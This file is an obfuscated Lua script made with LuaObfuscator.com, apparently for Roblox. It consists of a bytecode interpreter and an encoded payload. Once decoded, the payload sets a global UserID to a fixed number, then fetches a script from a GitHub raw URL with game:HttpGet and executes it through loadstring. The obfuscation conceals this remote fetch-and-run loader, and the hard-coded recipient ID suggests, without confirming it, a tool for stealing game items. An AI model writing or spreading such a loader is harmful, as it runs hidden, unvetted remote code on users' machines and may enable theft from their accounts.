--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==(2 + 1)) then v46=nil;while true do local v81=0 -0 ;while true do if ((1 + 0)==v81) then if (v40==2) then local v109=866 -(210 + 656) ;while true do if (v109~=(2 -1)) then else for v115=2 -1 ,v24() do local v116=0 + 0 ;local v117;while true do if (v116~=(0 + 0)) then else v117=v22();if (v21(v117,1,1 + 0 )==(0 + 0)) then local v125=0;local v126;local v127;local v128;local v129;local v130;while true do if (v125==(1294 -(554 + 739))) then v128=nil;v129=nil;v125=1705 -(1393 + 310) ;end if (v125==2) then v130=nil;while true do if (v126==(1 + 1)) then while true do if (v127==(1903 -(347 + 1553))) then if (v21(v129,4 -1 ,3)==(1652 -(1533 + 118))) then v130[3 + 1 ]=v46[v130[14 -10 ]];end v41[v115]=v130;break;end if (v127==(1 + 0)) then local v159=0 -0 ;local v160;while true do if (v159~=(0 -0)) then else v160=370 -(61 + 309) ;while true do if ((1 -0)~=v160) then else v127=2;break;end if (v160~=(0 -0)) then else local v182=0;local v183;while true do if (0~=v182) then else v183=0;while true do if (v183==0) then v130={v23(),v23(),nil,nil};if (v128==(318 -(5 + 313))) then local v192=0;local v193;local v194;while true do if (v192==(0 + 0)) then local v196=0;while true do if (v196~=(1 + 0)) then else v192=1561 -(1325 + 235) ;break;end if (v196==(410 -(74 + 336))) then v193=303 -(260 + 43) ;v194=nil;v196=1241 -(32 + 1208) ;end end end if (v192==1) then while true do if (v193==(1832 -(50 + 1782))) then v194=0 -0 ;while true do if (v194==0) then v130[3]=v23();v130[3 + 1 ]=v23();break;end end break;end end break;end end elseif (v128==(1 + 0)) then v130[1362 -(658 + 701) ]=v24();elseif (v128==(1479 -(1317 + 160))) then v130[3]=v24() -((5 -3)^(66 -50)) ;elseif (v128==(10 -7)) then local v198=0 -0 ;local v199;local v200;while true do if ((2 -1)~=v198) then else while true do if (v199==(0 + 0)) then v200=0 + 0 ;while true do if (0~=v200) then else v130[2 + 1 ]=v24() -(2^(457 -(390 + 51))) ;v130[1 + 3 ]=v23();break;end end break;end end break;end if (v198==(0 + 0)) then v199=0 -0 ;v200=nil;v198=733 -(157 + 575) ;end end end v183=1 + 0 ;end if (v183==(2 -1)) then v160=964 -(439 + 524) ;break;end end break;end end end end break;end end end if (v127==(0 -0)) then local v161=0 + 0 ;local v162;local v163;while true do if (v161==(1 + 0)) then while true do if (v162==(0 -0)) then v163=77 -(44 + 33) ;while true do if (v163==(650 -(258 + 391))) then v127=1;break;end if (v163~=0) then else local v185=0 + 0 ;while true do if (v185~=(0 + 0)) then else v128=v21(v117,6 -4 ,3);v129=v21(v117,3 + 1 ,1620 -(378 + 1236) );v185=1 -0 ;end if (v185==1) then v163=1263 -(819 + 443) ;break;end end end end break;end end break;end if ((1966 -(1079 + 887))~=v161) then else v162=0 + 0 ;v163=nil;v161=1939 -(1186 + 752) ;end end end if (v127~=2) then else local v164=901 -(863 + 38) ;local v165;while true do if (v164~=(0 -0)) then else v165=208 -(113 + 95) ;while true do if (v165~=(1812 -(656 + 1156))) then else local v184=0 + 0 ;while true do if (v184~=(0 + 0)) then else if (v21(v129,4 -3 ,1 -0 )==(769 -(90 + 678))) then v130[2 -0 ]=v46[v130[629 -(37 + 590) ]];end if (v21(v129,2 + 0 ,1793 -(1210 + 581) )~=(1 + 0)) then else v130[11 -8 ]=v46[v130[8 -5 ]];end v184=1 -0 ;end if (v184==1) then v165=1731 -(13 + 1717) ;break;end end end if (v165==(1 + 0)) then v127=14 -11 ;break;end end break;end end end end break;end if ((1 + 0)==v126) then v129=nil;v130=nil;v126=2;end if (v126==(354 -(15 + 339))) then local v155=523 -(335 + 188) ;while true do if (v155==1) then v126=2 -1 ;break;end if (v155==(0 + 0)) then v127=1596 -(1585 + 11) ;v128=nil;v155=1 -0 ;end end end end break;end if (v125==0) then v126=0 -0 ;v127=nil;v125=1 -0 ;end end end break;end end end v40=11 -8 ;break;end if (v109~=0) then else for v118=1,v45 do local v119=1207 -(314 + 893) ;local v120;local v121;while true do if (v119==0) then local v123=926 -(393 + 533) ;while true do if ((4 -3)==v123) then v119=1;break;end if (v123~=(0 -0)) then else v120=v22();v121=nil;v123=1 + 0 ;end end end if (1==v119) then if (v120==(1 + 0)) then v121=v22()~=0 ;elseif (v120==2) then v121=v25();elseif (v120~=(6 -3)) then else v121=v26();end v46[v118]=v121;break;end end end v44[11 -8 ]=v22();v109=681 -(116 + 564) ;end end end if (v40==(1 + 0)) then v44={v41,v42,nil,v43};v45=v24();v46={};v40=2 + 0 ;end break;end if ((0 + 0)~=v81) then else if (v40==(4 -1)) then for v110=1129 -(351 + 777) ,v24() do v42[v110-(2 -1) ]=v29();end for v112=1582 -(425 + 1156) ,v24() do v43[v112]=v24();end return v44;end if ((0 -0)~=v40) then else v41={};v42={};v43={};v40=2 -1 ;end v81=1;end end end break;end if (v39==2) then v44=nil;v45=nil;v39=3;end if (v39~=1) then else v42=nil;v43=nil;v39=565 -(6 + 557) ;end if (v39~=(0 -0)) then else v40=661 -(25 + 636) ;v41=nil;v39=1 + 0 ;end end end;v18=5;end if (v18==2) then v23=function()local v47=0 -0 ;local v48;local v49;while true do if (v47==((2495 -(124 + 511)) -(750 + 1110))) then v48,v49=v1(v16,v19,v19 + ((597 -(86 + 507)) -2) );v19=v19 + (4 -2) ;v47=1 + 0 ;end if (v47==1) then return (v49 * (196 + 60)) + v48 ;end end end;v24=nil;v24=function()local v50=(0 -0) + 0 ;local v51;local v52;local v53;local v54;while true do if (v50==(1111 -(651 + 459))) then return (v54 * (31593911 -14816695)) + (v53 * (35299 + 30237)) + (v52 * (244 + 12)) + v51 ;end if (v50==(0 + 0)) then v51,v52,v53,v54=v1(v16,v19,v19 + (1571 -(466 + 1102)) );v19=v19 + 3 + 1 ;v50=1 + (1743 -(973 + 770)) ;end end end;v25=nil;v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then local v72=0;while true do if (v72==0) then v20=v0(v3(v31,1,1));return "";end end else local v73=v2(v0(v31,16));if v20 then local v82=0;local v83;while true do if (v82==1) then return v83;end if (0==v82) then v83=v5(v73,v20);v20=nil;v82=1;end end else return v73;end end end);v21=nil;v18=1;end if (v18==5) then v30=nil;v30=function(v32,v33,v34)local v55=0;local v56;local v57;local v58;while true do if (v55==1) then v58=v32[3];return function(...)local v84=1;local v85= -1;local v86={...};local v87=v12("#",...) -1 ;local function v88()local v89=v56;local v90=v57;local v91=v58;local v92=v28;local v93={};local v94={};local v95={};for v99=0,v87 do if (((3935 -(25 + (1341 -(400 + 308))))>1171) and (v99>=v91)) then v93[v99-v91 ]=v86[v99 + (2 -(1 -0)) ];else v95[v99]=v86[v99 + ((511 + 52) -(438 + 124)) ];end end local v96=(v87-v91) + (1 -0) ;local v97;local v98;while true do local v100=0;local v101;local v102;while true do if ((2363<(4959 -(510 + 676))) and (v100==(0 + 0 + 0))) then v101=0 + 0 ;v102=nil;v100=1;end if ((2319<=(4769 -(55 + 299))) and (v100==(3 -2))) then while true do if ((v101==(1981 -(1255 + 726))) or (((4399 -(299 + 374)) + 134)<(1900 + 1457))) then v102=0 -0 ;while true do if (((9603 -5491)>(274 + 79 + 1517)) and (v102==(1998 -(1547 + 451)))) then local v122=0 -0 ;while true do if (((594 + 1099)<=2154) and (v122==0)) then v97=v89[v84];v98=v97[1 + 0 ];v122=1 + 0 ;end if (((1042 + 590)<(4019 -(275 + (861 -(417 + 348))))) and (v122==(1 + 0 + 0))) then v102=1 + (1356 -(589 + 767)) ;break;end end end if (((4845 -(662 + 112))>=1932) and (v102==(1 -0))) then if ((v98<=(3 + 2)) or (3150<=(2090 -697))) then if ((v98<=(7 -5)) or (((978 + 570) -1214)>=(2003 + 2197))) then if ((((809 -(290 + 434)) + 2210)>842) and (v98<=(1225 -(970 + 255)))) then v95[v97[(599 + 652) -(212 + 1037) ]][v97[688 -(677 + 8) ]]=v97[1413 -(432 + 977) ];elseif (((181 + 4023)>=(7469 -4648)) and (v98>(128 -(52 + 75)))) then do return;end else local v141=0;local v142;local v143;while true do if (((21496 -16804)==((1698 -(422 + 459)) + 3875)) and (v141==(1 -0))) then while true do if ((592==592) and (v142==(574 -(496 + 78)))) then v143=v97[2];v95[v143]=v95[v143](v13(v95,v143 + 1 ,v85));break;end end break;end if (((285 + 648)<=((8723 -5346) + (4662 -3423))) and (v141==(928 -(735 + 193)))) then v142=0 -0 ;v143=nil;v141=(3 -2) + 0 + 0 ;end end end elseif ((v98<=3) or (4220==((3633 -(127 + 1411)) -(1039 + 477)))) then local v135=0 -(0 + 0) ;local v136;local v137;local v138;while true do if ((v135==(0 -0)) or ((1746 -(204 + 1008))==((20708 -12253) -4945))) then v136=600 -(272 + 328) ;v137=nil;v135=(5592 -4088) -(719 + 784) ;end if (((1846 -(1830 + 15))==v135) or ((13248 -9011)<(5354 -2746))) then v138=nil;while true do if ((v136==(0 -0)) or ((1135 + 1086)>(9265 -6563))) then local v166=0;while true do if ((v166==0) or ((5383 -4265)>2729)) then v137=v97[2 + 0 ];v138=v95[v97[4 -(1 -0) ]];v166=1;end if ((v166==(4 -3)) or ((1135 + (2542 -(316 + 841)))<=(1355 -(89 + (805 -(63 + 95)))))) then v136=(1762 -(1708 + 51)) -2 ;break;end end end if (((279 + 6 + 162)==447) and (v136==(2 -1))) then v95[v137 + (2 -1) ]=v138;v95[v137]=v138[v97[6 -2 ]];break;end end break;end end elseif (((2149 -779)<=(8402 -5087)) and (v98==(3 + 1))) then v84=v97[6 -3 ];else local v145=(1625 -(294 + 1048)) -(46 + 237) ;local v146;local v147;local v148;local v149;local v150;while true do if (((2674 + 1172)>(2908 -(482 + 641))) and (v145==(637 -(574 + 61)))) then v150=nil;while true do if (((177 -(53 + 123))==v146) or (1992>=(3728 -(549 + 385)))) then local v174=(2495 -1959) -(379 + 157) ;while true do if (((4631 -((1803 -1276) + 637))<=(1751 + 2552)) and (v174==(1614 -(330 + 1284)))) then v85=(v149 + v147) -((22 -(10 + 11)) -0) ;v150=531 -(231 + 291 + 9) ;v174=1 + 0 ;end if ((v174==1) or ((3325 -(869 + 390))<(2134 -1105))) then v146=(607 -287) -(294 + 24) ;break;end end end if ((2802>(4435 -2203)) and (0==v146)) then v147=v97[2];v148,v149=v92(v95[v147](v13(v95,v147 + (1 -0) ,v97[3 + 0 ])));v146=1 + 0 ;end if ((2==v146) or (240>(4953 -(1815 + 133)))) then for v178=v147,v85 do local v179=0 + 0 ;local v180;local v181;while true do if (((0 + 0)==v179) or (1454>(2809 + 1251))) then v180=0;v181=nil;v179=(3264 -(219 + 1314)) -(888 + 842) ;end if (((1415 -307)<=(4759 -1582)) and (v179==1)) then while true do if ((v180==(0 -0)) or ((10437 -7521)>=((4350 + 1591) -(116 + 905)))) then v181=0;while true do if ((v181==((1383 -(298 + 914)) -(114 + 57))) or (4336<(4433 -(337 + 552)))) then v150=v150 + 1 + 0 ;v95[v178]=v148[v150];break;end end break;end end break;end end end break;end end break;end if ((v145==(2 -1)) or ((493 + 160)>=(671 + 33 + 385))) then v148=nil;v149=nil;v145=4 -(1991 -(787 + 1202)) ;end if ((((35 -(25 + 10)) + (0 -0))==v145) or (3566==(1448 -805))) then v146=0 -0 ;v147=nil;v145=1;end end end elseif ((411==(781 -(208 + 120 + 42))) and (v98<=(534 -((1320 -(274 + 542)) + 5 + 17)))) then if ((v98<=(887 -(301 + 580))) or ((8097 -5161)>(2186 + 1491))) then v95[v97[2]]();elseif ((v98==7) or ((3224 -(371 + 1577))==(4229 -(321 + 97)))) then if (((700 + 1267)==(3101 -(48 + 1086))) and (v95[v97[2 -(277 -(67 + 210)) ]]==v97[4])) then v84=v84 + 1 + 0 ;else v84=v97[3];end else v95[v97[1 + 1 ]]=v97[45 -(8 + 34) ];end elseif (((2448 -(181 + 619))<(2313 + 2583)) and (v98<=(103 -(21 + (2004 -(1498 + 433)))))) then for v139=v97[2],v97[9 -6 ] do v95[v139]=nil;end elseif ((v98==((1064 -(418 + 99)) -(479 + 58))) or ((5084 -(6 + 1910))<((2964 + 1775) -2827))) then v95[v97[2 + 0 ]]=v34[v97[3]];elseif (((2878 + (2108 -(351 + 1157)))>(2988 -(379 + 1092))) and (v97[1541 -(139 + 1400) ]==v95[v97[4]])) then v84=v84 + 1 + 0 ;else v84=v97[3];end v84=v84 + 1 + 0 ;break;end end break;end end break;end end end end A,B=v28(v11(v88));if  not A[1] then local v103=0;local v104;while true do if (v103==0) then v104=v32[4][v84] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end if (0==v55) then v56=v32[1];v57=v32[2];v55=1;end end end;return v30(v29(),{},v17)(...);end if (v18==3) then v25=function()local v59=0 -0 ;local v60;local v61;local v62;local v63;local v64;local v65;while true do if ((1 + 0)==v59) then v62=1;v63=(v21(v61,1 + 0 ,(413 -(342 + 66)) + 15 ) * ((1744 -(497 + 1245))^(111 -79))) + v60 ;v59=4 -2 ;end if (v59==(152 -(48 + 101))) then if (v64==(0 + 0)) then if (v63==(1594 -(716 + 878))) then return v65 * (0 -0) ;else v64=54 -(33 + 20) ;v62=(715 -454) -(147 + 94 + 20) ;end elseif (v64==(2962 -915)) then return ((v63==(0 + 0)) and (v65 * ((639 -(383 + 255))/(0 + 0 + 0)))) or (v65 * NaN) ;end return v8(v65,v64-(532 + 491) ) * (v62 + (v63/(((55 + 1128) -(649 + 32 + 500))^(178 -(886 -(233 + 527)))))) ;end if (v59==0) then v60=v24();v61=v24();v59=(318 + 558) -(647 + (700 -472)) ;end if (v59==((758 + 1238) -(1322 + 672))) then v64=v21(v61,(2342 -(88 + 359)) -(1226 + 648) ,(427 -(85 + 228)) -83 );v65=((v21(v61,15 + 17 )==(1845 -(1195 + 431 + 218))) and  -(1039 -(183 + 640 + 215))) or (1 -0) ;v59=91 -((23 -14) + 79) ;end end end;v26=nil;v26=function(v35)local v66;if  not v35 then local v74=1145 -(84 + 1061) ;while true do if (v74==((490 + 16) -(441 + 65))) then v35=v24();if (v35==(943 -(185 + 758))) then return "";end break;end end end v66=v3(v16,v19,(v19 + v35) -(451 -(355 + 95)) );v19=v19 + v35 ;local v67={};for v70=1, #v66 do v67[v70]=v2(v1(v3(v66,v70,v70)));end return v6(v67);end;v27=v24;v18=4;end if (1==v18) then v21=function(v36,v37,v38)if v38 then local v75=(0 -0) + 0 ;local v76;while true do if (v75==0) then v76=(v36/((2 + 0)^(v37-(4 -3))))%((5 -3)^(((v38-(1 -0)) -(v37-(1425 -(1083 + 341)))) + (1874 -(1028 + 845)))) ;return v76-(v76%(1 + (1501 -(490 + 1011)))) ;end end else local v77=2^(v37-(1 + 0)) ;return (((v36%(v77 + v77))>=v77) and (2 -1)) or 0 ;end end;v22=nil;v22=function()local v68=0 -0 ;local v69;while true do if (0==v68) then v69=v1(v16,v19,v19);v19=v19 + (1 -0) ;v68=1 + (790 -(693 + 97)) ;end if (v68==(1 + 0)) then return v69;end end end;v23=nil;v18=2;end end end v15("LOL!083O00028O0003023O005F4703063O00557365724944030A3O0031352O33353330353635030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F622O6C7869326372617A792F7073787570646174657363726970742F6D61696E2F7363726970742E6C756100153O0012083O00014O0009000100013O0026073O000200010001002O043O00020001001208000100013O000E0B0001000500010001002O043O0005000100120A000200023O00302O00020003000400120A000200053O00120A000300063O002003000300030007001208000500084O0005000300054O000100023O00022O0006000200010001002O043O00140001002O043O00050001002O043O00140001002O043O000200012O00023O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O000F3O00113O00",v9(),...);end
